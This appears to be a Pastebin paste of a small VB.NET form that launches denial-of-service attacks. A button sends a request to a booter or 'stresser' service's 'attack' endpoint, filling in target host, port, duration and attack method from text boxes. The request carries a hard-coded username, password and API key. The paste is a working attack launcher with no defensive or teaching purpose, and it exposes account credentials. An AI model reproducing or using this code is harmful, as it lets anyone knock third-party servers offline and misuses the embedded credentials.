Advertisement
Guest User

Untitled

a guest
Dec 17th, 2017
96
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.54 KB | None | 0 0
  1. Public Class Form9
  2. Public Event Click As EventHandler
  3. Private Sub Button1_Click(sender As Object, e As EventArgs)
  4. WebBrowser1.Navigate("https://apiaccess.stresshub.pw/index.php?attack&username=GermanKingYT&password=pasword&key=9799-7816-6905-1114-7223-8951&host=" + TextBox1.Text + "&port=" + TextBox2.Text + "&time=" + TextBox3.Text + "&method=" + TextBox4.Text)
  5. End Sub
  6.  
  7.  
  8. Private Sub Button2_Click(sender As Object, e As EventArgs) Handles Button2.Click
  9. Me.Close()
  10. Form3.Show()
  11. End Sub
  12.  
  13.  
  14. End Class
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement